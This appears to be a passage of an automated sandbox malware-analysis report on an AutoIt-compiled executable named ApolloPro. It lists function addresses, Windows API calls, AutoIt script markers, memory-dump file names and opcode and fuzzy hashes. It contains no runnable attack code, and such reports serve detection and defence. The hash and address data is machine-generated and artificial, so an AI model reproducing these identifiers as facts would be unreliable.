                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 256516436-0
                                                                                              • Opcode ID: b1f6b08a1f64a4bae5aa66c9f3f561c329b7ca7237beb3ec4eb08950dcf7f75a
                                                                                              • Instruction ID: aabb894ad473960c70baf86a449d5c285912efd1e4b04233247d07b13b7b8d90
                                                                                              • Opcode Fuzzy Hash: b1f6b08a1f64a4bae5aa66c9f3f561c329b7ca7237beb3ec4eb08950dcf7f75a
                                                                                              • Instruction Fuzzy Hash: E0316D31904205EBDF50EFA4DC85EAEB77AEF45310F1440AAED04AF256DB309A54DBA4
                                                                                              Function 0063AAAA Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006507EC
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 006507F4
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006507FF
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0065080A
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00650812
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0065081A
                                                                                                • Part of subcall function 0064FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0063AC6B), ref: 0064FFA7
                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0063AD08
                                                                                              • OleInitialize.OLE32(00000000), ref: 0063AD85
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00672F56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                              • String ID: <wo$\to$so
                                                                                              • API String ID: 1986988660-3779909664
                                                                                              • Opcode ID: b72a7d7dab055c35689f2a43bd6511879f8b98218b1f33a0944d0f82795f4457
                                                                                              • Instruction ID: 9a63879a53ceafe1bf72d75e7c7b02ff6ccca1f6ff9763e0b7d21830f404c989
                                                                                              • Opcode Fuzzy Hash: b72a7d7dab055c35689f2a43bd6511879f8b98218b1f33a0944d0f82795f4457
                                                                                              • Instruction Fuzzy Hash: 5081D6B09182448EC384EF39AD446797FEBFB99304700A16ED818C7372EB704419DF58
                                                                                              Function 006450DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1279 6450db-64514b CreateWindowExW * 2 ShowWindow * 2
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00645109
                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0064512A
                                                                                              • ShowWindow.USER32(00000000), ref: 0064513E
                                                                                              • ShowWindow.USER32(00000000), ref: 00645147
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateShow
                                                                                              • String ID: AutoIt v3$edit
                                                                                              • API String ID: 1584632944-3779509399
                                                                                              • Opcode ID: c9dc233b06359723c7bfc896ee96961b18da4ee18d556425feac62cfe7c84abc
                                                                                              • Instruction ID: eb5736453179f4ca6ba9bb8f4ead6bc11bdbecc288f497d47926a39fb5a8af54
                                                                                              • Opcode Fuzzy Hash: c9dc233b06359723c7bfc896ee96961b18da4ee18d556425feac62cfe7c84abc
                                                                                              • Instruction Fuzzy Hash: ABF0B271645294BAFB311B27AC4CE372E7EE7C6F60F01211EB904A21A1C6611951DAB0
                                                                                              Function 00699B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1280 699b16-699b9b call 644a8c call 699cf1 1285 699b9d 1280->1285 1286 699ba5-699c5c call 644ab2 * 4 call 644a8c call 65593c * 2 call 644ab2 call 6996c4 call 698f0e 1280->1286 1287 699b9f-699ba0 1285->1287 1309 699c5e-699c6e call 652f85 * 2 1286->1309 1310 699c73-699c77 1286->1310 1289 699ce8-699cee 1287->1289 1309->1287 1312 699c79-699cd1 call 6990c1 call 652f85 1310->1312 1313 699cd8-699cde call 652f85 1310->1313 1323 699cd6 1312->1323 1322 699ce0-699ce6 1313->1322 1322->1289 1323->1322
                                                                                              APIs
                                                                                                • Part of subcall function 00644A8C: _fseek.LIBCMT ref: 00644AA4
                                                                                                • Part of subcall function 00699CF1: _wcscmp.LIBCMT ref: 00699DE1
                                                                                                • Part of subcall function 00699CF1: _wcscmp.LIBCMT ref: 00699DF4
                                                                                              • _free.LIBCMT ref: 00699C5F
                                                                                              • _free.LIBCMT ref: 00699C66
                                                                                              • _free.LIBCMT ref: 00699CD1
                                                                                                • Part of subcall function 00652F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00659C54,00000000,00658D5D,006559C3,?), ref: 00652F99
                                                                                                • Part of subcall function 00652F85: GetLastError.KERNEL32(00000000,?,00659C54,00000000,00658D5D,006559C3,?), ref: 00652FAB
                                                                                              • _free.LIBCMT ref: 00699CD9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                                              • API String ID: 1552873950-2806939583
                                                                                              • Opcode ID: d667cb626fb00b74fb68d7994d77ceec83bd2d54a5c47002eb39c2a452eed69d
                                                                                              • Instruction ID: b0cf008c0e2299b13f38e012d7778fc24d39644fd002b6715724ef892b155a18
                                                                                              • Opcode Fuzzy Hash: d667cb626fb00b74fb68d7994d77ceec83bd2d54a5c47002eb39c2a452eed69d
                                                                                              • Instruction Fuzzy Hash: B7513BB1904259AFDF249F64DC45AAEBBBAFF48304F10009EB649A3341DB715A84CF68
                                                                                              Function 00650FE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1324 650fe6-650fec 1325 650ffb-650ffe call 65593c 1324->1325 1327 651003-651006 1325->1327 1328 650fee-650ff9 call 6535d1 1327->1328 1329 651008-65100b 1327->1329 1328->1325 1332 65100c-65104c call 6586c3 call 6587cb call 658701 1328->1332 1339 651055-651059 1332->1339 1340 65104e-651054 call 65105c 1332->1340 1340->1339
                                                                                              APIs
                                                                                                • Part of subcall function 0065593C: __FF_MSGBANNER.LIBCMT ref: 00655953
                                                                                                • Part of subcall function 0065593C: __NMSG_WRITE.LIBCMT ref: 0065595A
                                                                                                • Part of subcall function 0065593C: RtlAllocateHeap.NTDLL(00DC0000,00000000,00000001,?,?,?,?,00651003,?,0000FFFF), ref: 0065597F
                                                                                              • std::exception::exception.LIBCMT ref: 0065101C
                                                                                              • __CxxThrowException@8.LIBCMT ref: 00651031
                                                                                                • Part of subcall function 006587CB: RaiseException.KERNEL32(?,?,0000FFFF,006ECAF8,?,?,?,?,?,00651036,0000FFFF,006ECAF8,?,00000001), ref: 00658820
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                              • String ID: `=l$`=l$h=l
                                                                                              • API String ID: 3902256705-1239233958
                                                                                              • Opcode ID: 10770952801450fa4396d45637652e4432d31442c6fed9ba5240940169345110
                                                                                              • Instruction ID: 9ca7f47c64fb6064f29136c5cff9f6a8b21304f4f36d1e83f43311ef9783d423
                                                                                              • Opcode Fuzzy Hash: 10770952801450fa4396d45637652e4432d31442c6fed9ba5240940169345110
                                                                                              • Instruction Fuzzy Hash: C1F0F93050421DA6CB20BE58DC15EEE7BAE9F01312F10482DFC04A6781DF719B88C2D4
                                                                                              Function 0065563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 1559183368-0
                                                                                              • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                              • Instruction ID: 89174d865b1a8c9bae7f4271c6bf370eda8fb2ecf2f58049f753cfd1764a10e2
                                                                                              • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                              • Instruction Fuzzy Hash: CB51D930A00B45DBDB248F79C8985AE77A7AF04322F24876DFC26963E0D7709D598B40
                                                                                              Function 006352B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006352E6
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0063534A
                                                                                              • TranslateMessage.USER32(?), ref: 00635356
                                                                                              • DispatchMessageW.USER32(?), ref: 00635360
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1795658109-0
                                                                                              • Opcode ID: f342a66744f5fcf97b5cd5c9499033ee8b98ad68225c386ed7edd94a96653b95
                                                                                              • Instruction ID: 986b172cfeb2bc602128cc916f487d6123de06bf02e9c7ba46018ea37576706c
                                                                                              • Opcode Fuzzy Hash: f342a66744f5fcf97b5cd5c9499033ee8b98ad68225c386ed7edd94a96653b95
                                                                                              • Instruction Fuzzy Hash: 1631C430A08B069BFB309B64DC44FFA77EB9B01344F14106AE523972E1E7B5A986D791
                                                                                              Function 00631284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00631275,SwapMouseButtons,00000004,?), ref: 006312A8
                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00631275,SwapMouseButtons,00000004,?), ref: 006312C9
                                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00631275,SwapMouseButtons,00000004,?), ref: 006312EB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Control Panel\Mouse
                                                                                              • API String ID: 3677997916-824357125
                                                                                              • Opcode ID: 4110fde06af44f910d7a04b43eda660f6c5dfdc9591704a07bc9e40b3654fb91
                                                                                              • Instruction ID: 01eb4c2716ff51b5bee8f0358c04f534b9f5035d724a527574dcc7cdcb8f7ec5
                                                                                              • Opcode Fuzzy Hash: 4110fde06af44f910d7a04b43eda660f6c5dfdc9591704a07bc9e40b3654fb91
                                                                                              • Instruction Fuzzy Hash: C9112A75614208FFEB208FA4DC84EEFBBB9EF06745F105559F805DB210D6719E4097A0
                                                                                              Function 00645B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00645B58
                                                                                                • Part of subcall function 006456F8: _memset.LIBCMT ref: 00645787
                                                                                                • Part of subcall function 006456F8: _wcscpy.LIBCMT ref: 006457DB
                                                                                                • Part of subcall function 006456F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006457EB
                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00645BAD
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00645BBC
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00680D7C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1378193009-0
                                                                                              • Opcode ID: e559e430e3033ff6d48da760494df293ddc0b4219b78424ae8cb353d2abe131c
                                                                                              • Instruction ID: 157a1ee657b82d84d81391c7c7dd66c44625c9bfb8e1a4ca4442833d2348bb7d
                                                                                              • Opcode Fuzzy Hash: e559e430e3033ff6d48da760494df293ddc0b4219b78424ae8cb353d2abe131c
                                                                                              • Instruction Fuzzy Hash: F221AA705047849FF7B29B648895FEBBBEEDF05308F04058DE69A56282C3746989CB51
                                                                                              Function 0064278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006449C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006427AF,?,00000001), ref: 006449F4
                                                                                              • _free.LIBCMT ref: 0067FB04
                                                                                              • _free.LIBCMT ref: 0067FB4B
                                                                                                • Part of subcall function 006429BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00642ADF
                                                                                              Strings
                                                                                              • Bad directive syntax error, xrefs: 0067FB33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                              • String ID: Bad directive syntax error
                                                                                              • API String ID: 2861923089-2118420937
                                                                                              • Opcode ID: 2f2be847974e1a5ca3b3305ee498c5aa2628bf57bc0ced3a9451cb59334712dc
                                                                                              • Instruction ID: d2d2a8d3a05b9277c2344f35fa1fb65b55125cdd067a3c627dddb41f1bc68e06
                                                                                              • Opcode Fuzzy Hash: 2f2be847974e1a5ca3b3305ee498c5aa2628bf57bc0ced3a9451cb59334712dc
                                                                                              • Instruction Fuzzy Hash: 21913B71910219EFCF54EFA4C8919EEB7B6FF05310F14852EF819AB2A1EB309945CB54
                                                                                              Function 006448B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: AU3! ?l$EA06
                                                                                              • API String ID: 4104443479-4008771287
                                                                                              • Opcode ID: 9d4bb3648a5ac92cc8711e5c5be4ea2ba9cb175a36dcba0161042c26425b850e
                                                                                              • Instruction ID: 4246ae78f111bd2ab570cfa9fc371620a40dabdbeca37a0b5ee63c0dab740b04
                                                                                              • Opcode Fuzzy Hash: 9d4bb3648a5ac92cc8711e5c5be4ea2ba9cb175a36dcba0161042c26425b850e
                                                                                              • Instruction Fuzzy Hash: 9B417C62E041985BEF619B5488537FF7FA79F46300F184479E882EB386CE208DC993E5
                                                                                              Function 00699CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00644AB2: __fread_nolock.LIBCMT ref: 00644AD0
                                                                                              • _wcscmp.LIBCMT ref: 00699DE1
                                                                                              • _wcscmp.LIBCMT ref: 00699DF4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscmp$__fread_nolock
                                                                                              • String ID: FILE
                                                                                              • API String ID: 4029003684-3121273764
                                                                                              • Opcode ID: 9bad70665eae45111e245455f542153feca5617933340d125ce140670da7a3ee
                                                                                              • Instruction ID: 0149e5ac7e412f9d3a8f4d19dbf9d8eaace9caf250f1cad1eec61b8ccb360e32
                                                                                              • Opcode Fuzzy Hash: 9bad70665eae45111e245455f542153feca5617933340d125ce140670da7a3ee
                                                                                              • Instruction Fuzzy Hash: 1241FB72A40259BADF20DAA4CC46FEFB7FEDF49714F00046DFA00A7284DA719944CB69
                                                                                              Function 006431BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 0068032B
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00680375
                                                                                                • Part of subcall function 00650284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00642A58,?,00008000), ref: 006502A4
                                                                                                • Part of subcall function 006509C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006509E4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                                              • String ID: X
                                                                                              • API String ID: 3777226403-3081909835
                                                                                              • Opcode ID: 17cff3f36fc0114af86654fbee049fa98138e3c7e841cf18ddcf2bde3ff20b3e
                                                                                              • Instruction ID: 1ee540fbc00918412f9c57af7d9709ec5dbdffa37b3020c2c497cbbd75504a50
                                                                                              • Opcode Fuzzy Hash: 17cff3f36fc0114af86654fbee049fa98138e3c7e841cf18ddcf2bde3ff20b3e
                                                                                              • Instruction Fuzzy Hash: 7B21C371A002989BDB81DFD4C805BEE7BFAAF49300F10405AE804E7241DBB49A8DDFA5
                                                                                              Function 006AD1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 94b7ebb04c7e6f23e72f1b276618bc60108f4c69c70de43995d17eaad5e3b79c
                                                                                              • Instruction ID: 9cb1b350859fd9c2b42cf1b19608f3ea8579ff88066b2f19f0075617f444a81e
                                                                                              • Opcode Fuzzy Hash: 94b7ebb04c7e6f23e72f1b276618bc60108f4c69c70de43995d17eaad5e3b79c
                                                                                              • Instruction Fuzzy Hash: 56F106709083019FC754EF28C484A6ABBE6EF89314F14892DF89A9B751DB30ED45CF86
